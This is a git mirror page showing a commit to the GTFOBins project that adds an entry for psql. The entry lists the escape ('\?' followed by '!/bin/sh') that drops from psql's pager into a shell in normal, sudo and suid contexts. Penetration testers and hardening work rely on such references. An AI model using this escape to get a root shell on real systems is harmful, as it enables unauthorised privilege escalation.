1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-04-27 17:23:55 +02:00

New command: psql

This commit is contained in:
Emanuel Duss 2020-11-12 14:21:00 +01:00
parent 324e0e672a
commit 3d776d1ea8

18
_gtfobins/psql.md Normal file

@ -0,0 +1,18 @@
---
functions:
shell:
- code: |
psql
\?
!/bin/sh
sudo:
- code: |
psql
\?
!/bin/sh
suid:
- code: |
psql
\?
!/bin/sh
---